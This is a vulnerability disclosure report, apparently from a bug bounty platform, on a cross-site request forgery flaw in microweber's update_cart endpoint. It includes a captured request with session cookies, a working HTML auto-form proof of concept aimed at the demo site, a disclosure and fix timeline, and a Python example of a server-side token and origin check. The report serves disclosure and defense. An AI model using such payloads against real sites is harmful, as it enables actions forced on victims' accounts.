CSRF on update cart functionality in microweber/microweber

Valid

Reported on Mar 31st 2022


I found a CSRF vulnerability in the update cart functionality: no CSRF token is validated when the cart is updated as an authenticated user.

Vulnerable Request:

POST /demo/api/update_cart HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=oVrVA2TbkeiJJIMoTt9UgfFU9BzqP41iW8YIIzmy; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Amodules/load_module%3Ausers/action%3Aprofile; csrf-token-data=%7B%22value%22%3A%22MumtS5v538A6QyfXzmwvx2nhZeXTQSUsQOGQRIwn%22%2C%22expiry%22%3A1648713233295%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

price=199&content_id=12

Steps to Reproduce:

  • After authentication, click on any product and add it to the cart
  • Now, intercept the request. It is the POST /demo/api/update_cart request shown above under "Vulnerable Request".
  • As you can see, no CSRF token is being validated, so we can create a CSRF proof of concept to make things easier and to validate the issue.

CSRF Proof of Concept:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/update_cart" method="POST">
      <input type="hidden" name="price" value="199" />
      <input type="hidden" name="content&#95;id" value="12" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Now, for whoever opens the HTML file, the product will get added to their cart.

Impact

An attacker may be able to add a product of their choosing to the victim's account with minimal user interaction.

Occurrences

A CSRF token needs to be implemented and validated on this endpoint.
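The check that is missing on the endpoint, as an added example that is not part of the report or of microweber's code: a server-side CSRF gate in Python for the update_cart request. The names build_request, parse_request and csrf_check, and the session token value, are assumptions made here; the sample request is the report's captured one trimmed to the headers the check uses.

```python
import hmac
from urllib.parse import parse_qs

SITE_ORIGIN = "https://demo.microweber.org"  # origin the cart endpoint belongs to

def build_request(origin, fetch_site, body):
    """Constructed request in the shape of the one captured in the report;
    headers the check does not look at are omitted."""
    return "\r\n".join([
        "POST /demo/api/update_cart HTTP/1.1",
        "Host: demo.microweber.org",
        "Cookie: laravel_session=oVrVA2TbkeiJJIMoTt9UgfFU9BzqP41iW8YIIzmy",
        "Origin: " + origin,
        "Sec-Fetch-Site: " + fetch_site,
        "",
        body,
    ])

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, headers, form params)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params = {k: v[0] for k, v in parse_qs(body).items()}
    return request_line.split(" ", 1)[0], headers, params

def csrf_check(raw, session_token):
    """Return (allowed, reason). The client must echo the server-side per-session
    token in the _token field or X-CSRF-TOKEN header (Laravel's convention);
    Origin and Sec-Fetch-Site are checked first as an independent gate."""
    method, headers, params = parse_request(raw)
    if method in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"  # only state-changing requests need the token
    origin = headers.get("origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, "cross-site origin " + origin
    if headers.get("sec-fetch-site", "same-origin") != "same-origin":
        return False, "Sec-Fetch-Site " + headers["sec-fetch-site"]
    presented = params.get("_token") or headers.get("x-csrf-token")
    if not presented:
        return False, "missing csrf token"  # the report's captured request fails here
    if not hmac.compare_digest(presented, session_token):
        return False, "token mismatch"  # constant-time compare
    return True, "ok"

CAPTURED_REQUEST = build_request(SITE_ORIGIN, "same-origin", "price=199&content_id=12")  # same-origin, token-less
```

The browser-form proof of concept above arrives with a third-party Origin and Sec-Fetch-Site: cross-site, so it is rejected at the origin gate; the legitimate request from the report is rejected too until the client starts sending the token.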

We are processing your report and will contact the microweber team within 24 hours. 2 months ago
We have contacted a member of the microweber team and are waiting to hear back 2 months ago
We have sent a follow up to the microweber team. We will try again in 7 days. 2 months ago
Peter Ivanov modified the report 2 months ago
Peter Ivanov validated this vulnerability 2 months ago
Nithissh12 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on d5635f 2 months ago
Peter Ivanov has been awarded the fix bounty
index.php#L1-L196 has been validated